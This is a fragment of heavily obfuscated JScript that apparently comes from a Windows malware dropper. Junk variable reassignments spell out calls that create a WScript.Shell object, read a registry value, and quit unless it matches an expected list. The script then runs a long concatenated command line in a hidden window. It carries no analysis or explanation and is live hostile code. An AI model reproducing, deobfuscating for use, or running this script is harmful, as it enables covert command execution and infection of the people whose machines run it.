2 | var rioqny = this[knirs + jgjevsjok + nqequc + fbhznrsmu + owwtpowr + uzdhf + qicugiylh + vyimkex] ( this[ssgqqb + wjeoybgu + fmbbocb + nqequc + buxbcqp + knirs + vyimkex][tqksmdfxi + nqequc + owwtpowr + jgjevsjok + vyimkex + owwtpowr + tylhprysl + bapxcjv + nuazojiz + owwtpowr + fmbbocb + vyimkex] ( ssgqqb + wjeoybgu + fmbbocb + nqequc + buxbcqp + knirs + vyimkex + dxpsgcqr + wjeoybgu + heosct + owwtpowr + dyasyb + dyasyb ) [jfmgar + owwtpowr + psdndri + jfmgar + owwtpowr + jgjevsjok + gyaotq] ( ngbsdf + sfslgmme + cidagqsft + mczflnt + tmopnp + tqksmdfxi + pkwhuv + jfmgar + jfmgar + cidagqsft + brcngqlvq + dirfv + tmopnp + pkwhuv + wjeoybgu + cidagqsft + jfmgar + ofotvqup + tqksmdfxi + rvept + qicugiylh + vyimkex + nqequc + rvept + dyasyb + xadsud + thnna + jgjevsjok + qicugiylh + owwtpowr + dyasyb + ofotvqup + uzdhf + qicugiylh + vyimkex + owwtpowr + nqequc + qicugiylh + jgjevsjok + vyimkex + buxbcqp + rvept + qicugiylh + jgjevsjok + dyasyb + ofotvqup + qplso + rvept + fmbbocb + jgjevsjok + dyasyb + owwtpowr ), 16 ); |
|
3 | for ( pgwtvu = 0 ; pgwtvu < rfkceswou[dyasyb + owwtpowr + qicugiylh + psdndri + vyimkex + heosct] ; ++ pgwtvu ) | |
4 | { | |
5 | if ( rioqny == rfkceswou[pgwtvu] ) | |
6 | { | |
7 | rioqny = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( rioqny !== true ) | |
12 | this[ssgqqb + wjeoybgu + fmbbocb + nqequc + buxbcqp + knirs + vyimkex][hmfan + ricwos + buxbcqp + vyimkex] ( ); | |
13 | this[ssgqqb + wjeoybgu + fmbbocb + nqequc + buxbcqp + knirs + vyimkex][tqksmdfxi + nqequc + owwtpowr + jgjevsjok + vyimkex + owwtpowr + tylhprysl + bapxcjv + nuazojiz + owwtpowr + fmbbocb + vyimkex] ( ssgqqb + wjeoybgu + fmbbocb + nqequc + buxbcqp + knirs + vyimkex + dxpsgcqr + wjeoybgu + heosct + owwtpowr + dyasyb + dyasyb ) [nqequc + ricwos + qicugiylh] ( fmbbocb + iwdwmpls + gyaotq + xadsud + hyasyvulb + fmbbocb + xadsud + knirs + rvept + hqadxq + owwtpowr + nqequc + fbhznrsmu + heosct + owwtpowr + dyasyb + dyasyb + dxpsgcqr + owwtpowr + popzezlp + owwtpowr + xadsud + aeywuvsy + tqksmdfxi + rvept + iwdwmpls + iwdwmpls + jgjevsjok + qicugiylh + gyaotq + xadsud + gprrjdss + uzdhf + qicugiylh + bkfnsaw + rvept + fvmeqvqk + owwtpowr + aeywuvsy + ssgqqb + owwtpowr + bapxcjv + jfmgar + owwtpowr + bsvss + ricwos + owwtpowr + fbhznrsmu + vyimkex + xadsud + aeywuvsy + tylhprysl + ricwos + vyimkex + ahcadwgg + buxbcqp + dyasyb + owwtpowr + xadsud + jrotgk + vyimkex + owwtpowr + iwdwmpls + knirs + jrotgk + ofotvqup + buxbcqp + qicugiylh + bkfnsaw + rvept + buxbcqp + fmbbocb + owwtpowr + dxpsgcqr + knirs + gyaotq + izmkfyoq + xadsud + heosct + vyimkex + vyimkex + knirs + wqibfngq + hyasyvulb + hyasyvulb + wybiw + mxmxv + pynxfd + dxpsgcqr + wybiw + bcuyvk + pynxfd + dxpsgcqr + wybiw + dxpsgcqr + njtyoyxc + nnrqpiv + gqtlza + hyasyvulb + buxbcqp + qicugiylh + bkfnsaw + rvept + buxbcqp + fmbbocb + owwtpowr + dxpsgcqr + knirs + heosct + knirs + gprrjdss + jzsnqqesz + jzsnqqesz + fbhznrsmu + vyimkex + jgjevsjok + nqequc + vyimkex + xadsud + jrotgk + vyimkex + owwtpowr + iwdwmpls + knirs + jrotgk + ofotvqup + buxbcqp + qicugiylh + bkfnsaw + rvept + buxbcqp + fmbbocb + owwtpowr + dxpsgcqr + knirs + gyaotq + izmkfyoq + jzsnqqesz + jzsnqqesz + fmbbocb + iwdwmpls + gyaotq + xadsud + hyasyvulb + fmbbocb + xadsud + qicugiylh + owwtpowr + vyimkex + xadsud + ricwos + fbhznrsmu + owwtpowr + xadsud + ofotvqup + ofotvqup + wybiw + mxmxv + pynxfd + dxpsgcqr + wybiw + bcuyvk + pynxfd + dxpsgcqr + wybiw + dxpsgcqr + njtyoyxc + nnrqpiv + gqtlza + zlopyi + hurfqpq + hurfqpq + hurfqpq + hurfqpq + ofotvqup + gyaotq + jgjevsjok + bkfnsaw + hqadxq + hqadxq + hqadxq + nqequc + rvept + rvept + vyimkex + ofotvqup + jzsnqqesz + jzsnqqesz + fmbbocb + iwdwmpls + gyaotq + xadsud + hyasyvulb + fmbbocb + xadsud + nqequc + owwtpowr + psdndri + fbhznrsmu + bkfnsaw + nqequc + pynxfd + njtyoyxc + xadsud + hyasyvulb + fbhznrsmu + xadsud + ofotvqup + ofotvqup + wybiw + mxmxv + pynxfd + dxpsgcqr + wybiw + bcuyvk + pynxfd + dxpsgcqr + wybiw + dxpsgcqr + njtyoyxc + nnrqpiv + gqtlza + zlopyi + hurfqpq + hurfqpq + hurfqpq + hurfqpq + ofotvqup + gyaotq + jgjevsjok + bkfnsaw + hqadxq + hqadxq + hqadxq + nqequc + rvept + rvept + vyimkex + ofotvqup + wybiw + ptcjp + nnrqpiv + mxmxv + njtyoyxc + njtyoyxc + njtyoyxc + pynxfd + pynxfd + njtyoyxc + hurfqpq + mxmxv + bcuyvk + dxpsgcqr + gyaotq + dyasyb + dyasyb, 0, false ); |
|
14 | } | |
15 | fmbbocb = "A"; | |
16 | fmbbocb = "W"; | |
17 | fmbbocb = "G"; | |
18 | fmbbocb = "u"; | |
19 | fmbbocb = "m"; | |
20 | fmbbocb = "L"; | |
21 | fmbbocb = "S"; | |
22 | fmbbocb = "c"; | |
23 | fmbbocb = "y"; | |
24 | fmbbocb = "H"; | |
25 | fmbbocb = "c"; | |
26 | tqksmdfxi = "n"; | |
27 | tqksmdfxi = "v"; | |
28 | tqksmdfxi = "z"; | |
29 | tqksmdfxi = "l"; | |
30 | tqksmdfxi = "t"; | |
31 | tqksmdfxi = "h"; | |
32 | tqksmdfxi = "C"; | |
33 | ptcjp = "p"; | |
34 | ptcjp = "v"; | |
35 | ptcjp = "R"; | |
36 | ptcjp = "w"; | |
37 | ptcjp = "S"; | |
38 | ptcjp = "Z"; | |
39 | ptcjp = "C"; | |
40 | ptcjp = "Q"; | |
41 | ptcjp = "G"; | |
42 | ptcjp = "S"; | |
43 | ptcjp = "a"; | |
44 | ptcjp = "T"; | |
45 | ptcjp = "E"; | |
46 | ptcjp = "6"; | |
47 | dxpsgcqr = "L"; | |
48 | dxpsgcqr = "E"; | |
49 | dxpsgcqr = "o"; | |
50 | dxpsgcqr = "O"; | |
51 | dxpsgcqr = "J"; | |
52 | dxpsgcqr = "U"; | |
53 | dxpsgcqr = "t"; | |
54 | dxpsgcqr = "K"; | |
55 | dxpsgcqr = "U"; | |
56 | dxpsgcqr = "I"; | |
57 | dxpsgcqr = "T"; | |
58 | dxpsgcqr = "o"; | |
59 | dxpsgcqr = "N"; | |
60 | dxpsgcqr = "l"; | |
61 | dxpsgcqr = "z"; | |
62 | dxpsgcqr = "k"; | |
63 | dxpsgcqr = "S"; | |
64 | dxpsgcqr = "L"; | |
65 | dxpsgcqr = "K"; | |
66 | dxpsgcqr = "o"; | |
67 | dxpsgcqr = "."; | |
68 | bcuyvk = "i"; | |
69 | bcuyvk = "s"; | |
70 | bcuyvk = "K"; | |
71 | bcuyvk = "s"; | |
72 | bcuyvk = "B"; | |
73 | bcuyvk = "o"; | |
74 | bcuyvk = "P"; | |
75 | bcuyvk = "Y"; | |
76 | bcuyvk = "s"; | |
77 | bcuyvk = "O"; | |
78 | bcuyvk = "e"; | |
79 | bcuyvk = "f"; | |
80 | bcuyvk = "I"; | |
81 | bcuyvk = "n"; | |
82 | bcuyvk = "w"; | |
83 | bcuyvk = "S"; | |
84 | bcuyvk = "C"; | |
85 | bcuyvk = "P"; | |
86 | bcuyvk = "T"; | |
87 | bcuyvk = "s"; | |
88 | bcuyvk = "s"; | |
89 | bcuyvk = "b"; | |
90 | bcuyvk = "i"; | |
91 | bcuyvk = "h"; | |
92 | bcuyvk = "j"; | |
93 | bcuyvk = "n"; | |
94 | bcuyvk = "W"; | |
95 | bcuyvk = "M"; | |
96 | bcuyvk = "q"; | |
97 | bcuyvk = "W"; | |
98 | bcuyvk = "Z"; | |
99 | bcuyvk = "S"; | |
100 | bcuyvk = "a"; | |
101 | bcuyvk = "4"; | |
102 | knirs = "R"; | |
103 | knirs = "p"; | |
104 | knirs = "Z"; | |
105 | knirs = "U"; | |
106 | knirs = "f"; | |
107 | knirs = "t"; | |
108 | knirs = "T"; | |
109 | knirs = "L"; | |
110 | knirs = "G"; | |
111 | knirs = "M"; | |
112 | knirs = "c"; | |
113 | knirs = "U"; | |
114 | knirs = "f"; | |
115 | knirs = "D"; | |
116 | knirs = "u"; | |
117 | knirs = "c"; | |
118 | knirs = "B"; | |
119 | knirs = "n"; | |
120 | knirs = "z"; | |
121 | knirs = "O"; | |
122 | knirs = "p"; | |
123 | knirs = "N"; | |
124 | knirs = "V"; | |
125 | knirs = "r"; | |
126 | knirs = "p"; | |
127 | ahcadwgg = "d"; | |
128 | ahcadwgg = "Y"; | |
129 | ahcadwgg = "Y"; | |
130 | ahcadwgg = "c"; | |
131 | ahcadwgg = "v"; | |
132 | ahcadwgg = "F"; | |
133 | qplso = "R"; | |
134 | qplso = "W"; | |
135 | qplso = "e"; | |
136 | qplso = "a"; | |
137 | qplso = "d"; | |
138 | qplso = "x"; | |
139 | qplso = "T"; | |
140 | qplso = "x"; | |
141 | qplso = "O"; | |
142 | qplso = "L"; | |
143 | nqequc = "b"; | |
144 | nqequc = "u"; | |
145 | nqequc = "T"; | |
146 | nqequc = "e"; | |
147 | nqequc = "T"; | |
148 | nqequc = "j"; | |
149 | nqequc = "M"; | |
150 | nqequc = "n"; | |
151 | nqequc = "P"; | |
152 | nqequc = "z"; | |
153 | nqequc = "G"; | |
154 | nqequc = "U"; | |
155 | nqequc = "F"; | |
156 | nqequc = "j"; | |
157 | nqequc = "C"; | |
158 | nqequc = "A"; | |
159 | nqequc = "f"; | |
160 | nqequc = "X"; | |
161 | nqequc = "c"; | |
162 | nqequc = "j"; | |
163 | nqequc = "G"; | |
164 | nqequc = "I"; | |
165 | nqequc = "L"; | |
166 | nqequc = "v"; | |
167 | nqequc = "C"; | |
168 | nqequc = "N"; | |
169 | nqequc = "w"; | |
170 | nqequc = "q"; | |
171 | nqequc = "h"; | |
172 | nqequc = "X"; | |
173 | nqequc = "U"; | |
174 | nqequc = "j"; | |
175 | nqequc = "r"; | |
176 | wqibfngq = "l"; | |
177 | wqibfngq = "l"; | |
178 | wqibfngq = "E"; | |
179 | wqibfngq = "x"; | |
180 | wqibfngq = "Y"; | |
181 | wqibfngq = "B"; | |
182 | wqibfngq = "p"; | |
183 | wqibfngq = "r"; | |
184 | wqibfngq = "F"; | |
185 | wqibfngq = "z"; | |
186 | wqibfngq = "S"; | |
187 | wqibfngq = "k"; | |
188 | wqibfngq = "F"; | |
189 | wqibfngq = "w"; | |
190 | wqibfngq = "d"; | |
191 | wqibfngq = "e"; | |
192 | wqibfngq = "T"; | |
193 | wqibfngq = "R"; | |
194 | wqibfngq = "s"; | |
195 | wqibfngq = "W"; | |
196 | wqibfngq = "z"; | |
197 | wqibfngq = "B"; | |
198 | wqibfngq = "v"; | |
199 | wqibfngq = "X"; | |
200 | wqibfngq = "A"; | |
201 | wqibfngq = "z"; | |
202 | wqibfngq = "a"; | |
203 | wqibfngq = "D"; | |
204 | wqibfngq = "e"; | |
205 | wqibfngq = "y"; | |
206 | wqibfngq = "N"; | |
207 | wqibfngq = "y"; | |
208 | wqibfngq = "V"; | |
209 | wqibfngq = "w"; | |
210 | wqibfngq = "I"; | |
211 | wqibfngq = "o"; | |
212 | wqibfngq = "i"; | |
213 | wqibfngq = "U"; | |
214 | wqibfngq = "J"; | |
215 | wqibfngq = "l"; | |
216 | wqibfngq = "h"; | |
217 | wqibfngq = "a"; | |
218 | wqibfngq = "y"; | |
219 | wqibfngq = ":"; | |
220 | jzsnqqesz = "t"; | |
221 | jzsnqqesz = "n"; | |
222 | jzsnqqesz = "S"; | |
223 | jzsnqqesz = "T"; | |
224 | jzsnqqesz = "L"; | |
225 | jzsnqqesz = "T"; | |
226 | jzsnqqesz = "E"; | |
227 | jzsnqqesz = "n"; | |
228 | jzsnqqesz = "m"; | |
229 | jzsnqqesz = "j"; | |
230 | jzsnqqesz = "Z"; | |
231 | jzsnqqesz = "B"; | |
232 | jzsnqqesz = "r"; | |
233 | jzsnqqesz = "X"; | |
234 | jzsnqqesz = "Z"; | |
235 | jzsnqqesz = "f"; | |
236 | jzsnqqesz = "g"; | |
237 | jzsnqqesz = "C"; | |
238 | jzsnqqesz = "S"; | |
239 | jzsnqqesz = "f"; | |
240 | jzsnqqesz = "H"; | |
241 | jzsnqqesz = "B"; | |
242 | jzsnqqesz = "G"; | |
243 | jzsnqqesz = "F"; | |
244 | jzsnqqesz = "x"; | |
245 | jzsnqqesz = "E"; | |
246 | jzsnqqesz = "r"; | |
247 | jzsnqqesz = "o"; | |
248 | jzsnqqesz = "w"; | |
249 | jzsnqqesz = "X"; | |
250 | jzsnqqesz = "Q"; | |
251 | jzsnqqesz = "i"; | |
252 | jzsnqqesz = "D"; | |
253 | jzsnqqesz = "r"; | |
254 | jzsnqqesz = "C"; | |
255 | jzsnqqesz = "m"; | |
256 | jzsnqqesz = "u"; | |
257 | jzsnqqesz = "I"; | |
258 | jzsnqqesz = "Q"; | |
259 | jzsnqqesz = "Z"; | |
260 | jzsnqqesz = "x"; | |
261 | jzsnqqesz = "x"; | |
262 | jzsnqqesz = "&"; | |
263 | gprrjdss = "A"; | |
264 | gprrjdss = "L"; | |
265 | gprrjdss = "v"; | |
266 | gprrjdss = "k"; | |
267 | gprrjdss = "Z"; | |
268 | gprrjdss = "L"; | |
269 | gprrjdss = "o"; | |
270 | gprrjdss = "z"; | |
271 | gprrjdss = "K"; | |
272 | gprrjdss = "I"; | |
273 | gprrjdss = "\""; | |
274 | jrotgk = "z"; | |
275 | jrotgk = "Q"; | |
276 | jrotgk = "x"; | |
277 | jrotgk = "A"; | |
278 | jrotgk = "g"; | |
279 | jrotgk = "Q"; | |
280 | jrotgk = "y"; | |
281 | jrotgk = "p"; | |
282 | jrotgk = "I"; | |
283 | jrotgk = "S"; | |
284 | jrotgk = "C"; | |
285 | jrotgk = "x"; | |
286 | jrotgk = "M"; | |
287 | jrotgk = "d"; | |
288 | jrotgk = "A"; | |
289 | jrotgk = "D"; | |
290 | jrotgk = "l"; | |
291 | jrotgk = "E"; | |
292 | jrotgk = "D"; | |
293 | jrotgk = "z"; | |
294 | jrotgk = "Q"; | |
295 | jrotgk = "C"; | |
296 | jrotgk = "n"; | |
297 | jrotgk = "f"; | |
298 | jrotgk = "T"; | |
299 | jrotgk = "Y"; | |
300 | jrotgk = "E"; | |
301 | jrotgk = "a"; | |
302 | jrotgk = "D"; | |
303 | jrotgk = "Q"; | |
304 | jrotgk = "A"; | |
305 | jrotgk = "p"; | |
306 | jrotgk = "P"; | |
307 | jrotgk = "f"; | |
308 | jrotgk = "q"; | |
309 | jrotgk = "%"; | |
310 | vyimkex = "e"; | |
311 | vyimkex = "A"; | |
312 | vyimkex = "a"; | |
313 | vyimkex = "O"; | |
314 | vyimkex = "B"; | |
315 | vyimkex = "T"; | |
316 | vyimkex = "P"; | |
317 | vyimkex = "K"; | |
318 | vyimkex = "A"; | |
319 | vyimkex = "J"; | |
320 | vyimkex = "u"; | |
321 | vyimkex = "X"; | |
322 | vyimkex = "X"; | |
323 | vyimkex = "s"; | |
324 | vyimkex = "s"; | |
325 | vyimkex = "t"; | |
326 | pkwhuv = "g"; | |
327 | pkwhuv = "m"; | |
328 | pkwhuv = "V"; | |
329 | pkwhuv = "P"; | |
330 | pkwhuv = "y"; | |
331 | pkwhuv = "v"; | |
332 | pkwhuv = "G"; | |
333 | pkwhuv = "c"; | |
334 | pkwhuv = "m"; | |
335 | pkwhuv = "u"; | |
336 | pkwhuv = "S"; | |
337 | pkwhuv = "U"; | |
338 | nnrqpiv = "j"; | |
339 | nnrqpiv = "l"; | |
340 | nnrqpiv = "0"; | |
341 | tmopnp = "Z"; | |
342 | tmopnp = "F"; | |
343 | tmopnp = "R"; | |
344 | tmopnp = "F"; | |
345 | tmopnp = "e"; | |
346 | tmopnp = "e"; | |
347 | tmopnp = "p"; | |
348 | tmopnp = "U"; | |
349 | tmopnp = "y"; | |
350 | tmopnp = "E"; | |
351 | tmopnp = "z"; | |
352 | tmopnp = "Z"; | |
353 | tmopnp = "_"; | |
354 | fvmeqvqk = "U"; | |
355 | fvmeqvqk = "I"; | |
356 | fvmeqvqk = "k"; | |
357 | buxbcqp = "q"; | |
358 | buxbcqp = "S"; | |
359 | buxbcqp = "u"; | |
360 | buxbcqp = "p"; | |
361 | buxbcqp = "i"; | |
362 | owwtpowr = "O"; | |
363 | owwtpowr = "h"; | |
364 | owwtpowr = "E"; | |
365 | owwtpowr = "Q"; | |
366 | owwtpowr = "n"; | |
367 | owwtpowr = "j"; | |
368 | owwtpowr = "h"; | |
369 | owwtpowr = "N"; | |
370 | owwtpowr = "R"; | |
371 | owwtpowr = "A"; | |
372 | owwtpowr = "M"; | |
373 | owwtpowr = "P"; | |
374 | owwtpowr = "D"; | |
375 | owwtpowr = "P"; | |
376 | owwtpowr = "W"; | |
377 | owwtpowr = "d"; | |
378 | owwtpowr = "A"; | |
379 | owwtpowr = "l"; | |
380 | owwtpowr = "D"; | |
381 | owwtpowr = "m"; | |
382 | owwtpowr = "m"; | |
383 | owwtpowr = "e"; | |
384 | owwtpowr = "e"; | |
385 | fbhznrsmu = "E"; | |
386 | fbhznrsmu = "P"; | |
387 | fbhznrsmu = "q"; | |
388 | fbhznrsmu = "C"; | |
389 | fbhznrsmu = "U"; | |
390 | fbhznrsmu = "D"; | |
391 | fbhznrsmu = "s"; | |
392 | hmfan = "k"; | |
393 | hmfan = "b"; | |
394 | hmfan = "F"; | |
395 | hmfan = "f"; | |
396 | hmfan = "M"; | |
397 | hmfan = "O"; | |
398 | hmfan = "Q"; | |
399 | dyasyb = "e"; | |
400 | dyasyb = "e"; | |
401 | dyasyb = "d"; | |
402 | dyasyb = "n"; | |
403 | dyasyb = "n"; | |
404 | dyasyb = "b"; | |
405 | dyasyb = "V"; | |
406 | dyasyb = "L"; | |
407 | dyasyb = "N"; | |
408 | dyasyb = "E"; | |
409 | dyasyb = "D"; | |
410 | dyasyb = "h"; | |
411 | dyasyb = "m"; | |
412 | dyasyb = "F"; | |
413 | dyasyb = "J"; | |
414 | dyasyb = "o"; | |
415 | dyasyb = "S"; | |
416 | dyasyb = "B"; | |
417 | dyasyb = "D"; | |
418 | dyasyb = "Q"; | |
419 | dyasyb = "c"; | |
420 | dyasyb = "H"; | |
421 | dyasyb = "q"; | |
422 | dyasyb = "H"; | |
423 | dyasyb = "l"; | |
424 | dyasyb = "p"; | |
425 | dyasyb = "U"; | |
426 | dyasyb = "M"; | |
427 | dyasyb = "N"; | |
428 | dyasyb = "V"; | |
429 | dyasyb = "M"; | |
430 | dyasyb = "U"; | |
431 | dyasyb = "U"; | |
432 | dyasyb = "S"; | |
433 | dyasyb = "l"; | |
434 | njtyoyxc = "C"; | |
435 | njtyoyxc = "d"; | |
436 | njtyoyxc = "h"; | |
437 | njtyoyxc = "H"; | |
438 | njtyoyxc = "E"; | |
439 | njtyoyxc = "u"; | |
440 | njtyoyxc = "U"; | |
441 | njtyoyxc = "t"; | |
442 | njtyoyxc = "M"; | |
443 | njtyoyxc = "2"; | |
444 | bapxcjv = "G"; | |
445 | bapxcjv = "h"; | |
446 | bapxcjv = "M"; | |
447 | bapxcjv = "S"; | |
448 | bapxcjv = "w"; | |
449 | bapxcjv = "g"; | |
450 | bapxcjv = "S"; | |
451 | bapxcjv = "b"; | |
452 | mczflnt = "l"; | |
453 | mczflnt = "v"; | |
454 | mczflnt = "h"; | |
455 | mczflnt = "f"; | |
456 | mczflnt = "K"; | |
457 | mczflnt = "u"; | |
458 | mczflnt = "W"; | |
459 | mczflnt = "p"; | |
460 | mczflnt = "a"; | |
461 | mczflnt = "O"; | |
462 | mczflnt = "M"; | |
463 | mczflnt = "B"; | |
464 | mczflnt = "T"; | |
465 | mczflnt = "I"; | |
466 | mczflnt = "i"; | |
467 | mczflnt = "H"; | |
468 | mczflnt = "v"; | |
469 | mczflnt = "B"; | |
470 | mczflnt = "S"; | |
471 | mczflnt = "m"; | |
472 | mczflnt = "Y"; | |
473 | ofotvqup = "S"; | |
474 | ofotvqup = "a"; | |
475 | ofotvqup = "Y"; | |
476 | ofotvqup = "Q"; | |
477 | ofotvqup = "K"; | |
478 | ofotvqup = "x"; | |
479 | ofotvqup = "s"; | |
480 | ofotvqup = "g"; | |
481 | ofotvqup = "t"; | |
482 | ofotvqup = "H"; | |
483 | ofotvqup = "u"; | |
484 | ofotvqup = "p"; | |
485 | ofotvqup = "Z"; | |
486 | ofotvqup = "q"; | |
487 | ofotvqup = "H"; | |
488 | ofotvqup = "\\"; | |
489 | bkfnsaw = "k"; | |
490 | bkfnsaw = "W"; | |
491 | bkfnsaw = "k"; | |
492 | bkfnsaw = "i"; | |
493 | bkfnsaw = "M"; | |
494 | bkfnsaw = "l"; | |
495 | bkfnsaw = "v"; | |
496 | brcngqlvq = "g"; | |
497 | brcngqlvq = "X"; | |
498 | brcngqlvq = "X"; | |
499 | brcngqlvq = "j"; | |
500 | brcngqlvq = "M"; | |
501 | brcngqlvq = "Y"; | |
502 | brcngqlvq = "W"; | |
503 | brcngqlvq = "s"; | |
504 | brcngqlvq = "R"; | |
505 | brcngqlvq = "v"; | |
506 | brcngqlvq = "k"; | |
507 | brcngqlvq = "N"; | |
508 | brcngqlvq = "q"; | |
509 | brcngqlvq = "o"; | |
510 | brcngqlvq = "f"; | |
511 | brcngqlvq = "y"; | |
512 | brcngqlvq = "x"; | |
513 | brcngqlvq = "N"; | |
514 | dirfv = "x"; | |
515 | dirfv = "R"; | |
516 | dirfv = "d"; | |
517 | dirfv = "L"; | |
518 | dirfv = "a"; | |
519 | dirfv = "J"; | |
520 | dirfv = "H"; | |
521 | dirfv = "T"; | |
522 | bsvss = "K"; | |
523 | bsvss = "W"; | |
524 | bsvss = "F"; | |
525 | bsvss = "j"; | |
526 | bsvss = "J"; | |
527 | bsvss = "n"; | |
528 | bsvss = "V"; | |
529 | bsvss = "g"; | |
530 | bsvss = "D"; | |
531 | bsvss = "q"; | |
532 | bsvss = "k"; | |
533 | bsvss = "l"; | |
534 | bsvss = "O"; | |
535 | bsvss = "R"; | |
536 | bsvss = "e"; | |
537 | bsvss = "Y"; | |
538 | bsvss = "D"; | |
539 | bsvss = "z"; | |
540 | bsvss = "V"; | |
541 | bsvss = "j"; | |
542 | bsvss = "Y"; | |
543 | bsvss = "J"; | |
544 | bsvss = "r"; | |
545 | bsvss = "g"; | |
546 | bsvss = "J"; | |
547 | bsvss = "A"; | |
548 | bsvss = "a"; | |
549 | bsvss = "Y"; | |
550 | bsvss = "c"; | |
551 | bsvss = "b"; | |
552 | bsvss = "r"; | |
553 | bsvss = "K"; | |
554 | bsvss = "k"; | |
555 | bsvss = "U"; | |
556 | bsvss = "z"; | |
557 | bsvss = "g"; | |
558 | bsvss = "y"; | |
559 | bsvss = "q"; | |
560 | cidagqsft = "P"; | |
561 | cidagqsft = "f"; | |
562 | cidagqsft = "c"; | |
563 | cidagqsft = "k"; | |
564 | cidagqsft = "e"; | |
565 | cidagqsft = "I"; | |
566 | cidagqsft = "O"; | |
567 | cidagqsft = "Q"; | |
568 | cidagqsft = "H"; | |
569 | cidagqsft = "z"; | |
570 | cidagqsft = "T"; | |
571 | cidagqsft = "v"; | |
572 | cidagqsft = "S"; | |
573 | cidagqsft = "A"; | |
574 | cidagqsft = "X"; | |
575 | cidagqsft = "B"; | |
576 | cidagqsft = "f"; | |
577 | cidagqsft = "c"; | |
578 | cidagqsft = "E"; | |
579 | gqtlza = "k"; | |
580 | gqtlza = "5"; | |
581 | popzezlp = "b"; | |
582 | popzezlp = "Z"; | |
583 | popzezlp = "x"; | |
584 | popzezlp = "l"; | |
585 | popzezlp = "e"; | |
586 | popzezlp = "y"; | |
587 | popzezlp = "k"; | |
588 | popzezlp = "J"; | |
589 | popzezlp = "M"; | |
590 | popzezlp = "h"; | |
591 | popzezlp = "e"; | |
592 | popzezlp = "z"; | |
593 | popzezlp = "X"; | |
594 | popzezlp = "c"; | |
595 | popzezlp = "u"; | |
596 | popzezlp = "x"; | |
597 | popzezlp = "T"; | |
598 | popzezlp = "E"; | |
599 | popzezlp = "R"; | |
600 | popzezlp = "J"; | |
601 | popzezlp = "c"; | |
602 | popzezlp = "Y"; | |
603 | popzezlp = "E"; | |
604 | popzezlp = "g"; | |
605 | popzezlp = "U"; | |
606 | popzezlp = "m"; | |
607 | popzezlp = "I"; | |
608 | popzezlp = "x"; | |
609 | popzezlp = "c"; | |
610 | popzezlp = "Y"; | |
611 | popzezlp = "b"; | |
612 | popzezlp = "m"; | |
613 | popzezlp = "H"; | |
614 | popzezlp = "z"; | |
615 | popzezlp = "v"; | |
616 | popzezlp = "b"; | |
617 | popzezlp = "v"; | |
618 | popzezlp = "w"; | |
619 | popzezlp = "q"; | |
620 | popzezlp = "c"; | |
621 | popzezlp = "x"; | |
622 | mxmxv = "Q"; | |
623 | mxmxv = "X"; | |
624 | mxmxv = "v"; | |
625 | mxmxv = "m"; | |
626 | mxmxv = "k"; | |
627 | mxmxv = "i"; | |
628 | mxmxv = "r"; | |
629 | mxmxv = "O"; | |
630 | mxmxv = "Y"; | |
631 | mxmxv = "b"; | |
632 | mxmxv = "I"; | |
633 | mxmxv = "C"; | |
634 | mxmxv = "b"; | |
635 | mxmxv = "R"; | |
636 | mxmxv = "m"; | |
637 | mxmxv = "N"; | |
638 | mxmxv = "Q"; | |
639 | mxmxv = "s"; | |
640 | mxmxv = "9"; | |
641 | zlopyi = "I"; | |
642 | zlopyi = "k"; | |
643 | zlopyi = "j"; | |
644 | zlopyi = "m"; | |
645 | zlopyi = "Z"; | |
646 | zlopyi = "w"; | |
647 | zlopyi = "T"; | |
648 | zlopyi = "b"; | |
649 | zlopyi = "U"; | |
650 | zlopyi = "Y"; | |
651 | zlopyi = "R"; | |
652 | zlopyi = "H"; | |
653 | zlopyi = "o"; | |
654 | zlopyi = "o"; | |
655 | zlopyi = "H"; | |
656 | zlopyi = "D"; | |
657 | zlopyi = "L"; | |
658 | zlopyi = "g"; | |
659 | zlopyi = "E"; | |
660 | zlopyi = "B"; | |
661 | zlopyi = "S"; | |
662 | zlopyi = "X"; | |
663 | zlopyi = "x"; | |
664 | zlopyi = "d"; | |
665 | zlopyi = "P"; | |
666 | zlopyi = "h"; | |
667 | zlopyi = "I"; | |
668 | zlopyi = "C"; | |
669 | zlopyi = "f"; | |
670 | zlopyi = "X"; | |
671 | zlopyi = "y"; | |
672 | zlopyi = "K"; | |
673 | zlopyi = "e"; | |
674 | zlopyi = "s"; | |
675 | zlopyi = "C"; | |
676 | zlopyi = "@"; | |
677 | jgjevsjok = "c"; | |
678 | jgjevsjok = "C"; | |
679 | jgjevsjok = "v"; | |
680 | jgjevsjok = "Z"; | |
681 | jgjevsjok = "k"; | |
682 | jgjevsjok = "b"; | |
683 | jgjevsjok = "Q"; | |
684 | jgjevsjok = "B"; | |
685 | jgjevsjok = "A"; | |
686 | jgjevsjok = "o"; | |
687 | jgjevsjok = "r"; | |
688 | jgjevsjok = "a"; | |
689 | heosct = "x"; | |
690 | heosct = "P"; | |
691 | heosct = "s"; | |
692 | heosct = "a"; | |
693 | heosct = "F"; | |
694 | heosct = "f"; | |
695 | heosct = "t"; | |
696 | heosct = "c"; | |
697 | heosct = "l"; | |
698 | heosct = "K"; | |
699 | heosct = "Y"; | |
700 | heosct = "O"; | |
701 | heosct = "l"; | |
702 | heosct = "z"; | |
703 | heosct = "x"; | |
704 | heosct = "u"; | |
705 | heosct = "t"; | |
706 | heosct = "C"; | |
707 | heosct = "B"; | |
708 | heosct = "J"; | |
709 | heosct = "c"; | |
710 | heosct = "h"; | |
711 | heosct = "U"; | |
712 | heosct = "z"; | |
713 | heosct = "l"; | |
714 | heosct = "J"; | |
715 | heosct = "h"; | |
716 | heosct = "M"; | |
717 | heosct = "u"; | |
718 | heosct = "b"; | |
719 | heosct = "P"; | |
720 | heosct = "i"; | |
721 | heosct = "x"; | |
722 | heosct = "J"; | |
723 | heosct = "b"; | |
724 | heosct = "b"; | |
725 | heosct = "M"; | |
726 | heosct = "C"; | |
727 | heosct = "f"; | |
728 | heosct = "x"; | |
729 | heosct = "z"; | |
730 | heosct = "Z"; | |
731 | heosct = "h"; | |
732 | aeywuvsy = "t"; | |
733 | aeywuvsy = "G"; | |
734 | aeywuvsy = "V"; | |
735 | aeywuvsy = "k"; | |
736 | aeywuvsy = "S"; | |
737 | aeywuvsy = "s"; | |
738 | aeywuvsy = "H"; | |
739 | aeywuvsy = "a"; | |
740 | aeywuvsy = "z"; | |
741 | aeywuvsy = "-"; | |
742 | qicugiylh = "j"; | |
743 | qicugiylh = "r"; | |
744 | qicugiylh = "S"; | |
745 | qicugiylh = "u"; | |
746 | qicugiylh = "i"; | |
747 | qicugiylh = "O"; | |
748 | qicugiylh = "B"; | |
